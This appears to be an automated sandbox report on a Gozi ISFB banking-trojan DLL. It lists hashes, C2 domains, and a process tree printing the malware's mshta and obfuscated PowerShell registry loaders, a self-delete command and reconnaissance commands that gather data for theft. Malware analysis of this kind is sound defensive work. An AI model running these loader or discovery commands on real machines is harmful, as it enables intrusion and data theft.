gozi_ifsb | 06e26611fe5cf2fb04cfa894f9cb24edc0ab8306cf42c979b2c776372d07d1cf

Resubmissions

23-03-2022 11:22

220323-ngp6zahdal 10

24-01-2022 10:09

220124-l6sx2sebc2 10

Analysis

max time kernel
151s
max time network
124s
platform
windows10_x64
resource
win10-en-20211208
submitted
24-01-2022 10:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

61ee6edf7de65.dll
Size

95KB
MD5

b6f0fc5638a110abac1a54805f77e786
SHA1

f7eff5f67b1b794759ec0ba9b0d6a3bd5cd59bfe
SHA256

06e26611fe5cf2fb04cfa894f9cb24edc0ab8306cf42c979b2c776372d07d1cf
SHA512

b92f671821476bb041bd96a38b1ff300365d12d2fb6bec6266cfbd0f7613a3551807ddc3887ebee13911843322c3274af2a65ca1c38291b45506b433cccd15a8

Score

10^/10

gozi_ifsb 20000 banker trojan

Malware Config

Extracted

Family

gozi_ifsb

Botnet

20000

giporedtrip.at

habpfans.at

Attributes

base_path
/drew/
build
260224
exe_type
loader
extension
.jlk
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi_ifsb

Botnet

20000

giporedtrip.at

habpfans.at

Attributes

base_path
/images/
build
260224
exe_type
worker
extension
.jlk
server_id
50

rsa_pubkey.plain

aes.plain

rsa_pubkey.plain

Signatures

Gozi, Gozi IFSB
Gozi ISFB is a well-known and widely distributed banking trojan.
banker trojan gozi_ifsb
Blocklisted process makes network request 3 IoCs

Processes:

rundll32.exe

flow pid process

23 3140 rundll32.exe
24 3140 rundll32.exe
25 3140 rundll32.exe

flow	pid	process
23	3140	rundll32.exe
24	3140	rundll32.exe
25	3140	rundll32.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 3008 set thread context of 3020	3008	powershell.exe	Explorer.EXE
PID 3020 set thread context of 2304	3020	Explorer.EXE	cmd.exe
PID 3020 set thread context of 3492	3020	Explorer.EXE	RuntimeBroker.exe
PID 2304 set thread context of 1928	2304	cmd.exe	PING.EXE
PID 3020 set thread context of 1576	3020	Explorer.EXE	WinMail.exe
PID 3020 set thread context of 3204	3020	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Discovers systems in the same network 1 TTPs 3 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exenet.exenet.exe

pid process

1424 net.exe
1256 net.exe
2352 net.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

2124 tasklist.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

1972 systeminfo.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1928 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

1928 PING.EXE

pid	process
1424	net.exe
1256	net.exe
2352	net.exe

pid	process
2124	tasklist.exe

pid	process
1972	systeminfo.exe

pid	process
1928	PING.EXE

pid	process
1928	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

rundll32.exepowershell.exeExplorer.EXE

pid	process
3140	rundll32.exe
3140	rundll32.exe
3008	powershell.exe
3008	powershell.exe
3008	powershell.exe
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3020 Explorer.EXE
Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

3008 powershell.exe
3020 Explorer.EXE
3020 Explorer.EXE
2304 cmd.exe
3020 Explorer.EXE
3020 Explorer.EXE

pid	process
3020	Explorer.EXE

pid	process
3008	powershell.exe
3020	Explorer.EXE
3020	Explorer.EXE
2304	cmd.exe
3020	Explorer.EXE
3020	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 12 IoCs

Processes:

powershell.exeExplorer.EXEtasklist.exe

description	pid	process
Token: SeDebugPrivilege	3008	powershell.exe
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeDebugPrivilege	2124	tasklist.exe
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

3020 Explorer.EXE

pid	process
3020	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

rundll32.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 3804 wrote to memory of 3140	3804	rundll32.exe	rundll32.exe
PID 3804 wrote to memory of 3140	3804	rundll32.exe	rundll32.exe
PID 3804 wrote to memory of 3140	3804	rundll32.exe	rundll32.exe
PID 3728 wrote to memory of 3008	3728	mshta.exe	powershell.exe
PID 3728 wrote to memory of 3008	3728	mshta.exe	powershell.exe
PID 3008 wrote to memory of 1224	3008	powershell.exe	csc.exe
PID 3008 wrote to memory of 1224	3008	powershell.exe	csc.exe
PID 1224 wrote to memory of 692	1224	csc.exe	cvtres.exe
PID 1224 wrote to memory of 692	1224	csc.exe	cvtres.exe
PID 3008 wrote to memory of 4028	3008	powershell.exe	csc.exe
PID 3008 wrote to memory of 4028	3008	powershell.exe	csc.exe
PID 4028 wrote to memory of 1252	4028	csc.exe	cvtres.exe
PID 4028 wrote to memory of 1252	4028	csc.exe	cvtres.exe
PID 3008 wrote to memory of 3020	3008	powershell.exe	Explorer.EXE
PID 3008 wrote to memory of 3020	3008	powershell.exe	Explorer.EXE
PID 3008 wrote to memory of 3020	3008	powershell.exe	Explorer.EXE
PID 3008 wrote to memory of 3020	3008	powershell.exe	Explorer.EXE
PID 3020 wrote to memory of 2304	3020	Explorer.EXE	cmd.exe
PID 3020 wrote to memory of 2304	3020	Explorer.EXE	cmd.exe
PID 3020 wrote to memory of 2304	3020	Explorer.EXE	cmd.exe
PID 3020 wrote to memory of 3492	3020	Explorer.EXE	RuntimeBroker.exe
PID 3020 wrote to memory of 3492	3020	Explorer.EXE	RuntimeBroker.exe
PID 3020 wrote to memory of 2304	3020	Explorer.EXE	cmd.exe
PID 3020 wrote to memory of 2304	3020	Explorer.EXE	cmd.exe
PID 3020 wrote to memory of 3492	3020	Explorer.EXE	RuntimeBroker.exe
PID 3020 wrote to memory of 3492	3020	Explorer.EXE	RuntimeBroker.exe
PID 2304 wrote to memory of 1928	2304	cmd.exe	PING.EXE
PID 2304 wrote to memory of 1928	2304	cmd.exe	PING.EXE
PID 2304 wrote to memory of 1928	2304	cmd.exe	PING.EXE
PID 2304 wrote to memory of 1928	2304	cmd.exe	PING.EXE
PID 2304 wrote to memory of 1928	2304	cmd.exe	PING.EXE
PID 3020 wrote to memory of 3260	3020	Explorer.EXE	cmd.exe
PID 3020 wrote to memory of 3260	3020	Explorer.EXE	cmd.exe
PID 3260 wrote to memory of 2816	3260	cmd.exe	nslookup.exe
PID 3260 wrote to memory of 2816	3260	cmd.exe	nslookup.exe
PID 3020 wrote to memory of 2892	3020	Explorer.EXE	cmd.exe
PID 3020 wrote to memory of 2892	3020	Explorer.EXE	cmd.exe
PID 3020 wrote to memory of 2028	3020	Explorer.EXE	cmd.exe
PID 3020 wrote to memory of 2028	3020	Explorer.EXE	cmd.exe
PID 3020 wrote to memory of 1576	3020	Explorer.EXE	WinMail.exe
PID 3020 wrote to memory of 1576	3020	Explorer.EXE	WinMail.exe
PID 3020 wrote to memory of 1576	3020	Explorer.EXE	WinMail.exe
PID 2028 wrote to memory of 1972	2028	cmd.exe	systeminfo.exe
PID 2028 wrote to memory of 1972	2028	cmd.exe	systeminfo.exe
PID 3020 wrote to memory of 1576	3020	Explorer.EXE	WinMail.exe
PID 3020 wrote to memory of 1576	3020	Explorer.EXE	WinMail.exe
PID 3020 wrote to memory of 3204	3020	Explorer.EXE	cmd.exe
PID 3020 wrote to memory of 3204	3020	Explorer.EXE	cmd.exe
PID 3020 wrote to memory of 3204	3020	Explorer.EXE	cmd.exe
PID 3020 wrote to memory of 3204	3020	Explorer.EXE	cmd.exe
PID 3020 wrote to memory of 3204	3020	Explorer.EXE	cmd.exe
PID 3020 wrote to memory of 3204	3020	Explorer.EXE	cmd.exe
PID 3020 wrote to memory of 1748	3020	Explorer.EXE	cmd.exe
PID 3020 wrote to memory of 1748	3020	Explorer.EXE	cmd.exe
PID 3020 wrote to memory of 756	3020	Explorer.EXE	cmd.exe
PID 3020 wrote to memory of 756	3020	Explorer.EXE	cmd.exe
PID 756 wrote to memory of 1424	756	cmd.exe	net.exe
PID 756 wrote to memory of 1424	756	cmd.exe	net.exe
PID 3020 wrote to memory of 1792	3020	Explorer.EXE	cmd.exe
PID 3020 wrote to memory of 1792	3020	Explorer.EXE	cmd.exe
PID 3020 wrote to memory of 2676	3020	Explorer.EXE	cmd.exe
PID 3020 wrote to memory of 2676	3020	Explorer.EXE	cmd.exe
PID 2676 wrote to memory of 436	2676	cmd.exe	nslookup.exe
PID 2676 wrote to memory of 436	2676	cmd.exe	nslookup.exe

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3492

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3020

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll,#1
2⤵
- Suspicious use of WriteProcessMemory
PID:3804

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll,#1
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:3140

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Luo9='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Luo9).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\EC96820B-5BA5-FE9A-45E0-BF1249146366\\\PictureSettings'));if(!window.flag)close()</script>"
2⤵
- Suspicious use of WriteProcessMemory
PID:3728

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vawdrha -value gp; new-alias -name yhwgucfiht -value iex; yhwgucfiht ([System.Text.Encoding]::ASCII.GetString((vawdrha "HKCU:Software\AppDataLow\Software\Microsoft\EC96820B-5BA5-FE9A-45E0-BF1249146366").ClassComputer))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3008

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jvwlcj2l\jvwlcj2l.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1224

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC0BC.tmp" "c:\Users\Admin\AppData\Local\Temp\jvwlcj2l\CSC2A5D04B931C94D14B25922087C28C88.TMP"
5⤵
PID:692

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\13c1wxhm\13c1wxhm.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:4028

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC1D5.tmp" "c:\Users\Admin\AppData\Local\Temp\13c1wxhm\CSC393C66B810BE4D87BEC6A12440B7368.TMP"
5⤵
PID:1252

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2304

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1928

C:\Windows\system32\cmd.exe
cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\B9E4.bi1"
2⤵
- Suspicious use of WriteProcessMemory
PID:3260

C:\Windows\system32\nslookup.exe
nslookup myip.opendns.com resolver1.opendns.com
3⤵
PID:2816

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B9E4.bi1"
2⤵
PID:2892

C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\2039.bin1"
2⤵
- Suspicious use of WriteProcessMemory
PID:2028

C:\Windows\system32\systeminfo.exe
systeminfo.exe
3⤵
- Gathers system information
PID:1972

C:\Program Files\Windows Mail\WinMail.exe
"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
2⤵
PID:1576

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:3204

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
2⤵
PID:1748

C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
2⤵
- Suspicious use of WriteProcessMemory
PID:756

C:\Windows\system32\net.exe
net view
3⤵
- Discovers systems in the same network
PID:1424

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
2⤵
PID:1792

C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
2⤵
- Suspicious use of WriteProcessMemory
PID:2676

C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
3⤵
PID:436

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
2⤵
PID:2144

C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
2⤵
PID:2460

C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2124

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
2⤵
PID:1732

C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
2⤵
PID:1576

C:\Windows\system32\driverquery.exe
driverquery.exe
3⤵
PID:708

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
2⤵
PID:2244

C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
2⤵
PID:4016

C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
3⤵
PID:2624

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
2⤵
PID:2172

C:\Windows\system32\cmd.exe
cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
2⤵
PID:2700

C:\Windows\system32\net.exe
net config workstation
3⤵
PID:1908

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
4⤵
PID:2272

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
2⤵
PID:3992

C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
2⤵
PID:872

C:\Windows\system32\nltest.exe
nltest /domain_trusts
3⤵
PID:3696

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
2⤵
PID:1076

C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
2⤵
PID:1744

C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
3⤵
PID:1692

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
2⤵
PID:1928

C:\Windows\system32\cmd.exe
cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
2⤵
PID:912

C:\Windows\system32\net.exe
net view /all /domain
3⤵
- Discovers systems in the same network
PID:1256

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
2⤵
PID:1972

C:\Windows\system32\cmd.exe
cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
2⤵
PID:2316

C:\Windows\system32\net.exe
net view /all
3⤵
- Discovers systems in the same network
PID:2352

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
2⤵
PID:3048

C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\2039.bin1 > C:\Users\Admin\AppData\Local\Temp\2039.bin & del C:\Users\Admin\AppData\Local\Temp\2039.bin1"
2⤵
PID:2240

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Process Discovery

T1057

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\13c1wxhm\13c1wxhm.dll
MD5
2744b5da7811f14c798f67991dcbab48

SHA1
c445081cecb4b261cf1b3174a12b6381165ed16a

SHA256
5f1612f1cdfd76d364ecec760ad2d32f08646e2008492a7335e973a705365595

SHA512
8c0f3f4ec686cc4b067c3af9c1d20645fbdcd7ce5daa967573fc709134880c819a09912b05b004b33708196ed31fb0bbab936781dc24e03187db98d455f5816b

Download Submit
C:\Users\Admin\AppData\Local\Temp\2039.bin
MD5
8ca6257803d36829e3502fe894b3ec8f

SHA1
e06925abd9cc534fb3fd6cd50d390f9924a42cb8

SHA256
d4ce5b363f863991b2b611a8910f7d757edd0794e0c5239c95ca0859390e57cc

SHA512
684e4b6c6254b12adec904f4b523548f5d4076872be1939fc61901e500adfb266fa39def0268592b51e460ce7154a8ce5ea3c60f4578ead58e053ed9069023d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\2039.bin1
MD5
ecb7525f4380cade12b09d9c325f4187

SHA1
f08ac2cde62dea441f84a457552d77a1e0b38ded

SHA256
3dda972a01e6fd6eeae8eac8053541e31e013f785fe03b937654c77decbf2655

SHA512
5ea4f30a9368af1c54c5819333ad156a6aedde09026530b44ca14496ac8ee8069dbcd6ea52db1d6b8fa17ff1fbf7c40891b905aeb60a7fcd06a65545a80a26ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\2039.bin1
MD5
ecb7525f4380cade12b09d9c325f4187

SHA1
f08ac2cde62dea441f84a457552d77a1e0b38ded

SHA256
3dda972a01e6fd6eeae8eac8053541e31e013f785fe03b937654c77decbf2655

SHA512
5ea4f30a9368af1c54c5819333ad156a6aedde09026530b44ca14496ac8ee8069dbcd6ea52db1d6b8fa17ff1fbf7c40891b905aeb60a7fcd06a65545a80a26ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\2039.bin1
MD5
68fcecb9d39760569d7917876931c941

SHA1
bc440592668432906944912055bbf192fb437c9b

SHA256
c87180547e984f93dd9e0d904a768019bfb08b10a5639fc60590cdb48b5627f0

SHA512
3f4ad432802ce2507f57f7d6f64b494ddca96a9d59eafab9d7a39dd26579cea5341061a6929ce3e646672729ba00346c73c71dbc3d46eaeaec53a90d39f5e647

Download Submit
C:\Users\Admin\AppData\Local\Temp\2039.bin1
MD5
68fcecb9d39760569d7917876931c941

SHA1
bc440592668432906944912055bbf192fb437c9b

SHA256
c87180547e984f93dd9e0d904a768019bfb08b10a5639fc60590cdb48b5627f0

SHA512
3f4ad432802ce2507f57f7d6f64b494ddca96a9d59eafab9d7a39dd26579cea5341061a6929ce3e646672729ba00346c73c71dbc3d46eaeaec53a90d39f5e647

Download Submit
C:\Users\Admin\AppData\Local\Temp\2039.bin1
MD5
5f779c787614c0e2ab1709022d4422b5

SHA1
20182276c54c92a01cb608f582da535845d369bd

SHA256
567c91e83b91232c0f22279c7f5c975d64d12b195a5017727b5e6e4d1c8d8622

SHA512
c969ba943402d58adfe896815d223d31c7a62aeb25a82f4d21b8f25146ffc36c38d197d05e7e3e848d7a682bca788e8d619ed7b8860485aabe9b51a6a1228cc7

Download Submit
C:\Users\Admin\AppData\Local\Temp\2039.bin1
MD5
5f779c787614c0e2ab1709022d4422b5

SHA1
20182276c54c92a01cb608f582da535845d369bd

SHA256
567c91e83b91232c0f22279c7f5c975d64d12b195a5017727b5e6e4d1c8d8622

SHA512
c969ba943402d58adfe896815d223d31c7a62aeb25a82f4d21b8f25146ffc36c38d197d05e7e3e848d7a682bca788e8d619ed7b8860485aabe9b51a6a1228cc7

Download Submit
C:\Users\Admin\AppData\Local\Temp\2039.bin1
MD5
000891e99835670955ee57eb8f2f3ccf

SHA1
d40698655f27a057194112c6799222fec073819f

SHA256
12ec2e82ae901201ff35d56840038171bfb87187af6eb856c7aa5b3d32fd61a4

SHA512
8e36e8ba66d120c9af59da18e815d4755926d706019786da106d4de481a85be29374f65d18d30e7b3916d7a5f2e3700780024cff77bb4f3f47a6aca0996ec84d

Download Submit
C:\Users\Admin\AppData\Local\Temp\2039.bin1
MD5
000891e99835670955ee57eb8f2f3ccf

SHA1
d40698655f27a057194112c6799222fec073819f

SHA256
12ec2e82ae901201ff35d56840038171bfb87187af6eb856c7aa5b3d32fd61a4

SHA512
8e36e8ba66d120c9af59da18e815d4755926d706019786da106d4de481a85be29374f65d18d30e7b3916d7a5f2e3700780024cff77bb4f3f47a6aca0996ec84d

Download Submit
C:\Users\Admin\AppData\Local\Temp\2039.bin1
MD5
dc80049c2487894cfbe07fe0bd6dce3c

SHA1
b1073f1d62c59d8b7eb55f6b9bf27cddf5afef1b

SHA256
f1d05989ee98018b1f424dbcbc4e3f04f1df5d67c059e8da9b072e5fb4e8e5ed

SHA512
78cc674ab2644f8b25c1da9244f54c91b625f6831b49c49731b0d96f744190c8765b67b0736c26eee5c010d52925db0edc0f52b70760835a3e1653351adc530c

Download Submit
C:\Users\Admin\AppData\Local\Temp\2039.bin1
MD5
dc80049c2487894cfbe07fe0bd6dce3c

SHA1
b1073f1d62c59d8b7eb55f6b9bf27cddf5afef1b

SHA256
f1d05989ee98018b1f424dbcbc4e3f04f1df5d67c059e8da9b072e5fb4e8e5ed

SHA512
78cc674ab2644f8b25c1da9244f54c91b625f6831b49c49731b0d96f744190c8765b67b0736c26eee5c010d52925db0edc0f52b70760835a3e1653351adc530c

Download Submit
C:\Users\Admin\AppData\Local\Temp\2039.bin1
MD5
2111485e2463ae8e43ac97eced0ebb96

SHA1
41b545d143687428ff035f76aec73c74bb8426ca

SHA256
cc4b6e5d7c0fa71f7479ed2f42ffb9d9d357bae51c994cc647c80e3cc41d1b9b

SHA512
a3b12b4edd5debc8464817d4e0f31f6c6b5845bcc5b5773a466697bae22a1f832d96954699187593042c7e18e59eb507cf7b7019783f6c5125c7ec6626a9caef

Download Submit
C:\Users\Admin\AppData\Local\Temp\2039.bin1
MD5
2111485e2463ae8e43ac97eced0ebb96

SHA1
41b545d143687428ff035f76aec73c74bb8426ca

SHA256
cc4b6e5d7c0fa71f7479ed2f42ffb9d9d357bae51c994cc647c80e3cc41d1b9b

SHA512
a3b12b4edd5debc8464817d4e0f31f6c6b5845bcc5b5773a466697bae22a1f832d96954699187593042c7e18e59eb507cf7b7019783f6c5125c7ec6626a9caef

Download Submit
C:\Users\Admin\AppData\Local\Temp\2039.bin1
MD5
9cacce34b1a599165a8a33e6ce535b37

SHA1
45cd46e949a3a068fafb153836760745339a1806

SHA256
e1448e5434c66bf473b1307857b0857111214e4fde628d073bc03941bbd3cb20

SHA512
0c8d8b6ac25a135a3a9fbafa5494ec1f3477760f7dde3bfaac6452f9616782d18c945265881eaea3ac3b14e35e37938bc2b4469428016936bafebcbf481ffc66

Download Submit
C:\Users\Admin\AppData\Local\Temp\2039.bin1
MD5
9cacce34b1a599165a8a33e6ce535b37

SHA1
45cd46e949a3a068fafb153836760745339a1806

SHA256
e1448e5434c66bf473b1307857b0857111214e4fde628d073bc03941bbd3cb20

SHA512
0c8d8b6ac25a135a3a9fbafa5494ec1f3477760f7dde3bfaac6452f9616782d18c945265881eaea3ac3b14e35e37938bc2b4469428016936bafebcbf481ffc66

Download Submit
C:\Users\Admin\AppData\Local\Temp\2039.bin1
MD5
511d114b9b820096c4db4f856a6436e2

SHA1
92106cd5a499a807088d3b2037b71b78dd66e228

SHA256
2e6d461d9583c47f3389d62d9f99279c146f65b528bb253327acf6e6c6baeb8b

SHA512
c563d796b6b43408413144f93b8d985c6c758eab242b68686b3835041c2e45349773eba207dd5a924eb35d2772dfbdaad9f06fc8c545502a4d0f7eb4239e8539

Download Submit
C:\Users\Admin\AppData\Local\Temp\2039.bin1
MD5
463674fb18fc5df74bc393bd057be376

SHA1
1b2a09dba14b007e5fa3a0fd06c2f4b01d57aa17

SHA256
f681b9914feef6512ce2624a7cd695facc71aa8b526b41bd4a4fd504b81ea1c1

SHA512
09e6bc98317ed5854767dda74f237293df2ddca7db3e509991c671fccfe7c990effae1f3ed37ac5ebe37f74c4b379c8f91971208329a29581532335415d63729

Download Submit
C:\Users\Admin\AppData\Local\Temp\2039.bin1
MD5
d5bf46671e9da549104fd8cb5d60a94a

SHA1
513ec3c2817bfd83549fdca86e61a02f6da6023b

SHA256
8516468a3ed19d55123abc53bfc6eab152f41b0b6a67d13fbe5b6eb4820d40f9

SHA512
58edb1d6186ea5785ce398c6a474218aa5070e76bbf36e978330bfa7f2f7b54800beb3904bbc37aead64922face3efd41db210c29214eaa01622f527ac30cfd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\2039.bin1
MD5
d5bf46671e9da549104fd8cb5d60a94a

SHA1
513ec3c2817bfd83549fdca86e61a02f6da6023b

SHA256
8516468a3ed19d55123abc53bfc6eab152f41b0b6a67d13fbe5b6eb4820d40f9

SHA512
58edb1d6186ea5785ce398c6a474218aa5070e76bbf36e978330bfa7f2f7b54800beb3904bbc37aead64922face3efd41db210c29214eaa01622f527ac30cfd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\2039.bin1
MD5
8ca6257803d36829e3502fe894b3ec8f

SHA1
e06925abd9cc534fb3fd6cd50d390f9924a42cb8

SHA256
d4ce5b363f863991b2b611a8910f7d757edd0794e0c5239c95ca0859390e57cc

SHA512
